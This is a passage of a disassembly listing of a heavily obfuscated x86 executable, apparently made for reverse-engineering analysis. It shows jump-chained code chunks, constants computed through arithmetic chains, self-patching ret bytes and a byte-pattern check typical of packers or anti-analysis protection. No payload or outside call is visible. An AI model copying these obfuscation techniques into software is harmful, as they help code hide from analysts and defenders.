; FUNCTION CHUNK AT 00455E29 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	ax, 20FFh

loc_43E2DA:				; CODE XREF: sub_444825+4323j
		jz	loc_452656
		xor	eax, eax

loc_43E2E2:				; CODE XREF: sub_43E2D2:loc_454274j
		mov	[ebp-5], al
		jmp	loc_455E29
sub_43E2D2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43E2EA	proc near		; DATA XREF: y2kk37jd:loc_4544B1o

; FUNCTION CHUNK AT 004542AA SIZE 00000005 BYTES

		rol	eax, 1Eh
		xor	eax, 5B4E9C39h
		jmp	loc_4542AA
sub_43E2EA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43E2F8:				; CODE XREF: sub_453867j
		mov	eax, ds:dword_444A5C
		or	eax, eax
		jnz	loc_44960A
		jmp	loc_456FF1
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E30B:				; CODE XREF: sub_445226:loc_45BD64j
		push	offset sub_445568
		jmp	loc_44360B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

locret_43E315:				; CODE XREF: y2kk37jd:004594EDj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4449BB

loc_43E316:				; CODE XREF: sub_4449BB+14j
		jmp	loc_456B55
; END OF FUNCTION CHUNK	FOR sub_4449BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_43E31B:				; CODE XREF: sub_44107E+3488j
					; y2kk37jd:00457B85j
		jmp	loc_457E19
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4526A0

loc_43E320:				; CODE XREF: sub_4526A0-11AB8j
		jnz	loc_451DB8
		or	eax, 2630C251h
		pop	ebp
		push	0D22B9D23h
; END OF FUNCTION CHUNK	FOR sub_4526A0
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_43E332:				; CODE XREF: sub_4526A0-14FCFj
					; sub_4492F7:loc_44D90Cj ...
		xor	edx, 0E3FEB72Ah

loc_43E338:				; CODE XREF: y2kk37jd:00443A44j
		jmp	loc_458880
; END OF FUNCTION CHUNK	FOR sub_4492F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_43E33D:				; CODE XREF: sub_44001E+5DA1j
		call	sub_43BA66
		call	sub_4595D8

loc_43E347:				; CODE XREF: sub_45B7AA-5A01j
		jmp	loc_43E41C
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_43E34C:				; CODE XREF: sub_455C79-15F7Bj
		jmp	loc_444F33
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_43E351:				; CODE XREF: sub_449C4F-6F9Aj
					; sub_442DDC+4B5Fj ...
		jmp	loc_453D27
; END OF FUNCTION CHUNK	FOR sub_4553C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43E356:				; CODE XREF: sub_4553C1-F3A1j
					; sub_449C4F:loc_448A9Fj
		call	sub_44159D
; END OF FUNCTION CHUNK	FOR sub_449C4F
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_43E35B:				; CODE XREF: sub_44610D:loc_440D14j
		mov	eax, [ebp-8]
		mov	dword ptr [ebp+eax*4-70h], 73257325h
		inc	dword ptr [ebp-8]
		call	sub_44610D

loc_43E36E:				; CODE XREF: sub_43DF8A:loc_454D0Aj
		xor	edi, 0B8E1C8Ah
		add	edi, 8AF6BB2Dh
		xchg	edi, [esp+0]
		jmp	loc_443D3C
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------

loc_43E382:				; CODE XREF: y2kk37jd:0044789Aj
		xchg	ebx, [edi]
		jmp	sub_459EC3

; =============== S U B	R O U T	I N E =======================================



sub_43E389	proc near		; CODE XREF: y2kk37jd:0044EF8Aj
					; sub_43BD3D+16EC5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D657 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ECD1 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00441AE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443244 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444F24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447673 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449023 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044D8DA SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00450CF1 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	59CE4D39h
		pop	eax
		add	eax, ds:4000EFh
		and	eax, 1E93A1C0h
		jmp	loc_450CF1
sub_43E389	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_43E3A4:				; CODE XREF: sub_443AA7-69B3j
		jge	loc_45AD17
		push	3543D02Ah

loc_43E3AF:				; CODE XREF: sub_458A36:loc_442728j
		call	sub_45405E
		mov	edx, 0D504D785h
		call	sub_441288

loc_43E3BE:				; CODE XREF: sub_45392D-116C9j
					; sub_45B7AA:loc_45B829j
		jmp	nullsub_37
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DF1F

loc_43E3C3:				; CODE XREF: sub_43DF1F+7j
					; sub_4411C3:loc_4527C6j
		xor	eax, 8E3F602Ah
		and	eax, 7D507E69h
		add	eax, 0B345343Bh
		xchg	eax, [esp+4+var_4]
		jmp	loc_45B26A
; END OF FUNCTION CHUNK	FOR sub_43DF1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453778

loc_43E3DD:				; CODE XREF: sub_453778+79F1j
		push	edi
		push	0A2E2061h
		pop	edi
		or	edi, 0AE361E24h
		sub	edi, 0B135B38Fh
		jmp	loc_445865
; END OF FUNCTION CHUNK	FOR sub_453778
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_43E3F5:				; CODE XREF: sub_43FEFB+DBBj
					; sub_43FEFB:loc_459E28j
		add	ebx, 0D09025F5h
		xchg	ebx, [esp+0]
		jmp	nullsub_22
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; ---------------------------------------------------------------------------
		push	ebx
		push	64953079h
		xchg	eax, [esp]
		jmp	loc_44B20C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAAA

loc_43E411:				; CODE XREF: sub_45AAAA:loc_43F474j
		jnz	loc_443F3F
		jmp	loc_44DE94
; END OF FUNCTION CHUNK	FOR sub_45AAAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_43E41C:				; CODE XREF: sub_44001E:loc_43E347j
		add	esi, 86E355CAh
		xor	edx, ecx
		cmp	ebp, edx
		jmp	loc_456650
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_43E42B:				; CODE XREF: sub_4554A3+Cj
		xor	eax, 7136DF6Ah
		sub	eax, 0DCA8D8h
		add	eax, 0A269393Ch
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43BC9F
		jmp	loc_45BFA5
; END OF FUNCTION CHUNK	FOR sub_4554A3
; ---------------------------------------------------------------------------
		mov	eax, 9FB5C94Ah
		jmp	sub_445116

; =============== S U B	R O U T	I N E =======================================



sub_43E456	proc near		; CODE XREF: sub_44229C+6p
					; y2kk37jd:0045C4B3j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044A833 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044E9F2 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [eax]
		push	eax
		push	ebx
		push	1F566CA4h
		jmp	loc_44A833
sub_43E456	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E468:				; CODE XREF: sub_445226:loc_43F59Fj
		mov	eax, ecx
		jb	loc_45AFEC
; END OF FUNCTION CHUNK	FOR sub_445226
; START	OF FUNCTION CHUNK FOR sub_457524

loc_43E470:				; CODE XREF: sub_457524:loc_43B6C3j
					; sub_445226:loc_4420F2j ...
		mov	eax, [ebp-4]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_44C39D
		jmp	loc_43D204
; END OF FUNCTION CHUNK	FOR sub_457524
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_343. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_43E48B:				; CODE XREF: sub_44CEAB+5A3Fj
		jmp	nullsub_453
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450618

loc_43E490:				; CODE XREF: sub_450618+8j
		jmp	nullsub_99
; END OF FUNCTION CHUNK	FOR sub_450618
; ---------------------------------------------------------------------------

loc_43E495:				; CODE XREF: y2kk37jd:00449C7Dj
		jmp	loc_44724E
; ---------------------------------------------------------------------------
		push	offset sub_456410
		jmp	loc_44D2AD
; ---------------------------------------------------------------------------
		mov	ds:off_41E10C, eax
		lea	eax, sub_455958
		mov	byte ptr [eax],	0C3h
		jmp	sub_455958
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455958

loc_43E4B8:				; CODE XREF: sub_455958+1j
		mov	eax, [esp+0]
		push	edx
		nop
		mov	eax, 2867838Ah
		jmp	loc_43F11A
; END OF FUNCTION CHUNK	FOR sub_455958
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_43E4C7:				; CODE XREF: sub_44E5E5:loc_43BF83j
		test	al, al
		jz	loc_454362
		jmp	loc_453A48
; END OF FUNCTION CHUNK	FOR sub_44E5E5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_245. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43E4D5:				; CODE XREF: sub_448DCA-627Bj
		jmp	loc_43F271
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5E5

loc_43E4DA:				; CODE XREF: sub_44E5E5:loc_453A48j
		jnz	loc_43F1BE
		jmp	loc_4415AE
; END OF FUNCTION CHUNK	FOR sub_44E5E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_43E4E5:				; CODE XREF: sub_43F75D:loc_44608Ej
		pop	ebx
		or	ebx, 66DF08F7h
		and	ebx, ds:4000F1h
		sub	ebx, 9B9E4408h
		xor	ebx, 7C9E41A0h
		jmp	loc_445019
; END OF FUNCTION CHUNK	FOR sub_43F75D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43E504:				; CODE XREF: y2kk37jd:0044A1A2j
		jmp	sub_442C3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_43E509:				; CODE XREF: sub_454D0F-E1D6j
		jmp	loc_43DB16
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_43E50E:				; CODE XREF: sub_43C46D+E161j
		jno	loc_4579B7

loc_43E514:				; CODE XREF: y2kk37jd:0043FA76j
					; sub_43C46D:loc_454E41j
		push	5FE334B6h
		pop	eax
		add	eax, 0B02E03FFh
		jmp	loc_43B9D9
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E525:				; CODE XREF: sub_445226:loc_43D911j
		jz	loc_43B9A3
		jmp	loc_449D9D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43E530:				; CODE XREF: y2kk37jd:loc_43BB39j
					; sub_45689F:loc_45128Bj
		jg	loc_44BD85
		jg	loc_443755
		push	edi
		mov	edi, [ebp+0]
		jmp	loc_45BACA
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_43E545:				; CODE XREF: sub_445787:loc_44C4DBj
		pop	esi
		and	esi, 52001299h
		xor	esi, 5281F14Ch
		sub	esi, 0F6648908h
		jb	loc_446C12

loc_43E55E:				; CODE XREF: y2kk37jd:0044B0A1j
		jmp	loc_455059
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448159

loc_43E563:				; CODE XREF: sub_448159:loc_448163j
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		mov	ebx, ecx

loc_43E569:				; CODE XREF: y2kk37jd:00458E6Cj
		pop	ecx
		xchg	ebp, [esp-8+arg_4]
		mov	ecx, ebp
		pop	ebp
		jmp	loc_440841
; END OF FUNCTION CHUNK	FOR sub_448159

; =============== S U B	R O U T	I N E =======================================



sub_43E575	proc near		; DATA XREF: y2kk37jd:0044E1E7o
		lea	eax, loc_45A1CE
		mov	byte ptr [eax],	0C3h
		jmp	loc_456DB1
sub_43E575	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_43E583:				; CODE XREF: sub_448CAE:loc_45A1CEj
		pop	edx
		call	sub_445EF2

loc_43E589:				; CODE XREF: sub_43DC73+Bj
		push	edx
		push	0EF05A98h
		pop	edx
		or	edx, 448E117Fh
		add	edx, 0C33C1A62h
		sub	edx, 0B986E9FCh
		add	edx, 0A79179CBh
		jmp	loc_43CEDE
; END OF FUNCTION CHUNK	FOR sub_448CAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_475. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43E5AE:				; CODE XREF: sub_45689F-1739Fj
		jmp	loc_450D6B
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_43E5B3:				; CODE XREF: y2kk37jd:0045999Bj
		jnp	loc_443AFE

; =============== S U B	R O U T	I N E =======================================



sub_43E5B9	proc near		; CODE XREF: y2kk37jd:0044AF7Ap

arg_0		= dword	ptr  4

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edi, [esp-4+arg_0]
		jmp	loc_4405BC
sub_43E5B9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43E5C5:				; CODE XREF: y2kk37jd:loc_43EB12j
		jnz	loc_4479BB
		jmp	loc_458E77
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_43E5D0:				; CODE XREF: sub_45596A:loc_4592DAj
		jz	loc_448FE3
		jmp	loc_451AE3
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_43E5DB:				; CODE XREF: sub_43C7B9:loc_44F415j
		mov	ebp, esp
		push	ebx
		mov	ebx, ecx
		xchg	ebx, [esp+8+var_8]
		mov	esp, ebp
		jmp	loc_43DF0C
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_43E5EA:				; CODE XREF: sub_43EF4F+12F80j
		not	eax
		pushf

loc_43E5ED:				; CODE XREF: sub_43EF4F:loc_44AA24j
		call	sub_44B2F0

loc_43E5F2:				; CODE XREF: sub_4507BF-2F05j
		jz	loc_44BBB6
		jmp	loc_43ECF3
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------

loc_43E5FD:				; CODE XREF: y2kk37jd:004582C3j
		or	ecx, edx

loc_43E5FF:				; CODE XREF: y2kk37jd:004582B7j
		add	ebx, 13031201h
		add	eax, ebx
		pop	ebx
		jmp	loc_4544B1
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_45447D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CC9

loc_43E613:				; CODE XREF: sub_445CC9+Ej
		jl	loc_443636
; END OF FUNCTION CHUNK	FOR sub_445CC9

; =============== S U B	R O U T	I N E =======================================



sub_43E619	proc near		; CODE XREF: sub_457FACp
		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_448DCA

loc_43E622:				; CODE XREF: y2kk37jd:00457826j
		jmp	ds:off_41E114
sub_43E619	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_43E628:				; CODE XREF: sub_4577FE-2BDFj
		jmp	loc_43EE2F
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------

loc_43E62D:				; CODE XREF: y2kk37jd:004532BBj
		jmp	sub_44FB21
; ---------------------------------------------------------------------------

locret_43E632:				; CODE XREF: y2kk37jd:loc_446897j
		retn
; ---------------------------------------------------------------------------

loc_43E633:				; CODE XREF: y2kk37jd:004434EDj
		jmp	loc_459054
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_43E638:				; CODE XREF: sub_454C24+5516j
		jnz	loc_447D7E
		cmp	ebx, ebp
		jmp	loc_447D6F
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------

loc_43E645:				; CODE XREF: y2kk37jd:00441E9Ej
		xor	esi, 0D8B7D8C3h
		xchg	ebp, ecx
; START	OF FUNCTION CHUNK FOR sub_43BA66

loc_43E64D:				; CODE XREF: sub_43BA66:loc_441E83j
		xor	edi, 4B7BBE9Ah
		call	sub_43FBB9
; END OF FUNCTION CHUNK	FOR sub_43BA66

; =============== S U B	R O U T	I N E =======================================



sub_43E658	proc near		; CODE XREF: sub_45ADEC:loc_447F0Dp
					; y2kk37jd:00456B18j

; FUNCTION CHUNK AT 00449170 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B7EB SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	93C0C22Ah
		pop	eax
		or	eax, 0A174DC10h
		sub	eax, 0F96BCDA3h
		xor	eax, 6387F11Fh
		jmp	loc_449170
sub_43E658	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43E679	proc near		; DATA XREF: sub_44F484+15o

; FUNCTION CHUNK AT 00441705 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441AC7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004443C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044699E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447181 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448652 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00448C20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004495B7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B8B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EF2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515DC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452EF2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455003 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458532 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045ADFB SIZE 0000001A BYTES

		push	2A265916h
		pop	edi
		and	edi, 4AD93C38h
		cmp	edi, 4326E10Dh
		jmp	loc_4495B7
sub_43E679	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_43E690:				; CODE XREF: sub_44D51F:loc_4534B8j
		mov	al, [eax]
		mov	[ebp+var_9], al
		mov	al, [ebp+var_A]
		and	al, 7
		jmp	loc_45B3B7
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45596A

loc_43E69F:				; CODE XREF: sub_45596A:loc_45A37Bj
		xchg	eax, [esp+0]
		mov	ebp, eax
		pop	eax
		mov	eax, ds:dword_4516DC
		or	eax, eax
		jnz	loc_43EA99
		jmp	loc_4592DA
; END OF FUNCTION CHUNK	FOR sub_45596A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458101

loc_43E6B8:				; CODE XREF: sub_458101:loc_4437E3j
		add	edx, ebp
		add	edx, 8879BBBEh
		mov	edx, [edx]
		call	sub_44F2A0
; END OF FUNCTION CHUNK	FOR sub_458101
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43E6C7:				; CODE XREF: sub_4507BF+9742j
		add	edx, 7330FED4h
		xor	edx, 4F28EE2Ch
		rol	edx, 0Dh
		jb	loc_4553CC
; END OF FUNCTION CHUNK	FOR sub_4507BF
; START	OF FUNCTION CHUNK FOR sub_43EDE5

loc_43E6DC:				; CODE XREF: sub_43EDE5+10j
		jmp	loc_452B00
; END OF FUNCTION CHUNK	FOR sub_43EDE5
; ---------------------------------------------------------------------------
		test	eax, 0C47DD436h
		jmp	loc_4541B8
; ---------------------------------------------------------------------------

loc_43E6EC:				; CODE XREF: y2kk37jd:00444DA2j
					; y2kk37jd:00457BDDj
		push	esi
		push	60B5A2A8h
		pop	esi
		sub	esi, 0FB74C233h
		add	esi, 9B04D880h
		xchg	esi, [esp]
		jmp	loc_43C122

; =============== S U B	R O U T	I N E =======================================



sub_43E707	proc near		; CODE XREF: sub_43E707+33F9p
					; y2kk37jd:loc_459025j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00441AF3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450174 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452F69 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		call	sub_454D0F

loc_43E713:				; CODE XREF: sub_445226:loc_448E3Bj
		mov	eax, 0EF9F7D01h
		call	sub_442C3E
		mov	ds:off_41E06C, eax
		lea	eax, loc_441AF3
		jmp	loc_450174
sub_43E707	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DD0E

loc_43E72E:				; CODE XREF: sub_43DD0E+17F1Aj
					; y2kk37jd:00457963j
		jl	loc_44653D

loc_43E734:				; CODE XREF: sub_44FA95-10CD4j
		jmp	loc_44F4A3
; END OF FUNCTION CHUNK	FOR sub_43DD0E
; ---------------------------------------------------------------------------
		pop	edx
		jmp	loc_446534
; ---------------------------------------------------------------------------
		mov	eax, 3FFC3041h
		call	sub_442C3E
		mov	ds:dword_41E0A0, eax
		lea	eax, nullsub_181
		jmp	loc_43B81C
; ---------------------------------------------------------------------------
		jmp	ds:off_41E13C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_43E760:				; CODE XREF: y2kk37jd:loc_4451F8j
					; sub_45119A-4EAAj ...
		pop	edx
		js	loc_45B9A6
		mov	eax, [esp-8+arg_4]
		push	edx
		push	esi
		jmp	loc_447637
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------
		ror	edi, 5
		jmp	loc_45643B
; ---------------------------------------------------------------------------

loc_43E779:				; CODE XREF: y2kk37jd:00442F1Aj
		jg	loc_44B48C
		push	3E086417h
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43E784:				; CODE XREF: sub_449C4F:loc_43B5BBj
		add	edx, 72984CAFh
		call	sub_457C64
; END OF FUNCTION CHUNK	FOR sub_449C4F
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43E78F:				; CODE XREF: sub_453867-15900j
		jz	loc_454013
		jmp	loc_445AC8
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_43E79A:				; CODE XREF: sub_448700:loc_453186j
		jz	loc_43B6FE
		cmp	ecx, edi
		jmp	loc_454F0A
; END OF FUNCTION CHUNK	FOR sub_448700
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_264. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	0FA2A3253h
		pop	eax
		or	eax, 6D30103Fh
		jnz	loc_449EEA
; START	OF FUNCTION CHUNK FOR sub_45598E

loc_43E7BA:				; CODE XREF: sub_45598E+9j
		jmp	loc_44A13A
; END OF FUNCTION CHUNK	FOR sub_45598E
; ---------------------------------------------------------------------------

loc_43E7BF:				; CODE XREF: y2kk37jd:0044A105j
		jmp	locret_445332
; ---------------------------------------------------------------------------
		adc	eax, 2A49F226h
		mov	ecx, [edx]
		jmp	loc_449EEA
; ---------------------------------------------------------------------------
		popf
		sub	ebx, esi
		xor	eax, esi
		sbb	esi, 1A8E0AA4h
		jmp	loc_44A5DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_43E7E1:				; CODE XREF: sub_43F770-4578j
		test	edx, 4C562FBBh
		jmp	loc_444432
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_45BB99
; ---------------------------------------------------------------------------

loc_43E7F2:				; CODE XREF: y2kk37jd:004580B5j
		shl	esi, 1Fh
; START	OF FUNCTION CHUNK FOR sub_44310A

loc_43E7F5:				; CODE XREF: sub_44310A:loc_4580A9j
		add	edx, ds:4000E8h
		and	edx, 1D991E09h
		or	edx, 9E13242Bh
; END OF FUNCTION CHUNK	FOR sub_44310A
; START	OF FUNCTION CHUNK FOR sub_449F5B

loc_43E807:				; CODE XREF: sub_449F5B+Ej
		xor	edx, 2480277Eh
		call	sub_440CD1
		push	eax
		jmp	loc_444F3E
; END OF FUNCTION CHUNK	FOR sub_449F5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_43E818:				; CODE XREF: sub_44DF1D:loc_442428j
		pop	edx
		xor	edx, 34C71FD5h

loc_43E81F:				; CODE XREF: y2kk37jd:loc_445551j
		sub	edx, 59EF3048h
		rol	edx, 7
		sub	edx, 0DB0EE835h
		xor	edx, 9DFD5F67h
		jmp	loc_4520C8
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
		jnz	loc_43B17D
		jmp	sub_45AC8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_43E844:				; CODE XREF: sub_4507BF-8BDCj
		jz	loc_441BBF
		jmp	loc_453E5C
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C104

loc_43E84F:				; CODE XREF: sub_45C104:loc_457DE4j
		pop	ebp
		call	sub_45BB99
; END OF FUNCTION CHUNK	FOR sub_45C104
; START	OF FUNCTION CHUNK FOR sub_456809

loc_43E855:				; CODE XREF: sub_456809+389Fj
		jmp	loc_4483F7
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_43E85A:				; CODE XREF: y2kk37jd:0044E37Cj
		jmp	locret_44A6CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43E85F:				; CODE XREF: sub_45B7AA+4E7j
		jg	nullsub_477
		jmp	loc_4542E6
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------

loc_43E86A:				; DATA XREF: sub_457239-17DF8o
		mov	al, 1
		shl	al, cl
		mov	edx, [ebp-20h]
		push	offset sub_45392D
		jmp	loc_458E08
; ---------------------------------------------------------------------------

loc_43E87B:				; DATA XREF: sub_4417AF+Ao
		cmp	eax, [ebp-8]
		jnz	loc_441845
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		xor	edx, edx
		push	edx
		jmp	loc_445782
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_43E895:				; CODE XREF: sub_4597AE:loc_43C1B3j
		mov	eax, [esp+0]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+4+var_4]
		push	edx
		jmp	loc_444640
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_43E8A4:				; CODE XREF: sub_4518C3:loc_4528A7j
		jz	loc_43C37B
		jmp	loc_44D463
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------

loc_43E8AF:				; CODE XREF: y2kk37jd:loc_44ADF3j
		jnp	loc_4480CE
		sub	ebx, ebp
		jmp	sub_44E35F
; ---------------------------------------------------------------------------
		test	edx, 0B046AAC3h
		jmp	loc_43B5A9
; ---------------------------------------------------------------------------

loc_43E8C7:				; DATA XREF: y2kk37jd:00441483o
		shl	eax, 8
		mov	edx, [ebp-20h]
		movzx	edx, byte ptr [edx]
		or	eax, edx
		mov	[ebp-1Ch], eax
		jmp	loc_4495D9

; =============== S U B	R O U T	I N E =======================================



sub_43E8DA	proc near		; CODE XREF: sub_440F0C:loc_44A64Aj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

